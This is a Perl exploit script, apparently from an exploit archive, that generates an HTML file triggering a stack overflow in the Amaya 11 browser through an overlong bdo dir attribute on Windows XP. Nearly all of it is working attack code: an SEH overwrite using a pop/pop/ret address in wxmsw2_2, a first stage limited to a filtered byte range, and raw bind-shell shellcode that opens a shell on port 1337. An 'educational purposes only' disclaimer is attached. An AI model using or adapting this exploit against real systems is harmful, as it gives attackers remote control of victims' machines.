# Title : Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (xp)
# Published : 2009-02-04
# Author : Rob Carter
#!/usr/bin/perl
#####################################################
#
# Amaya 11 bdo tag remote stack overflow exploit
#
# author: Rob Carter (cartrel@hotmail.com)
#
# affects: winxp sp0-3
#
# the vulnerable code path only lets byte values
# between 0x01 and 0x7f reach the stack unchanged,
# so the first stage had to be built from opcodes
# in that range: SEH is overwritten with a
# compatible pop/pop/ret address, eax is set up
# with instructions whose opcodes all fall in the
# allowed range, and a ret then sends eip to
# another memory range where an unfiltered copy
# of the payload is still intact. that copy is
# what lets standard metasploit shellcode run
# with no special encoder.
#
# i was able to get this working on sp2-3 VERY
# easily because none of amaya's modules were
# compiled with the /SAFESEH option, so i could
# simply overwrite SEH with the address of a
# pop pop ret in wxmsw2_2 (0x02101917) and
# execution was returned to my shellcode.
# (that address is presumably tied to the base
# wxmsw2_2 loads at on the tested build; verify
# it in a debugger before relying on it.)
#
# binds a shell to port 1337 of the victim
#
# $ perl amaya_sploit.pl > pwn.html
#
# the author is not responsible for any misuse of
# this code. it is intended for educational
# purposes only
#
#####################################################
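use strict;
use warnings;
use constant SEH_OFFSET => 6889;    # bytes of filler from the start of the dir attribute to the SEH record

# The payload is raw binary; make sure no text-mode newline translation can
# alter the bytes on the way out.
binmode STDOUT;

# Second stage: unencoded metasploit bind-shell (header says it listens on
# TCP 1337; "\x66\x68\x05\x39" below pushes port 0x0539 in network byte order).
# It contains bytes above 0x7f, so it can only execute from the unfiltered
# copy of the buffer that the first stage jumps to, never from the filtered
# stack copy. Kept as a package global, as in the original script.
our $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
"\x66\x68\x05\x39\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";

# The overlong dir attribute of a <bdo> element triggers the overflow.
# Layout after the filler: nSEH (4) | SEH handler (4) | first stage | nop sled | shellcode.
# Every first-stage opcode is within 0x01..0x7f so it survives the filter
# described in the header.
our $payload = "<bdo dir=\""
    . 'A' x SEH_OFFSET
    . "\x74\x06\x41\x41"      # nSEH: je short +6 (0x74) over the handler slot; an unconditional
                              # jmp short (0xEB) is outside the allowed range, so this relies on
                              # ZF being set when the pop/pop/ret returns here
    . "\x17\x19\x10\x02"      # SEH handler: 0x02101917, pop/pop/ret in wxmsw2_2 (no /SAFESEH)
    . "\x68\x7f\x01\x01\x7f"  # push 0x7f01017f
    . "\x58"                  # pop eax              ; eax = 0x7f01017f
    . "\x2d\x18\x69\x45\x7d"  # sub eax, 0x7d456918  ; eax = 0x01bb9867
                              # (the original comment said 7a7a0857, which does not match these bytes)
    . "\x50"                  # push eax
    . "\xc3"                  # ret                  ; eip = 0x01bb9867, where per the header an
                              # unfiltered copy of this buffer is still intact
    . "\x90" x 100            # nop sled; 0x90 is only usable in that unfiltered copy
    . $shellcode
    . "\">pwnd!</bdo>";

print $payload or die "print: $!";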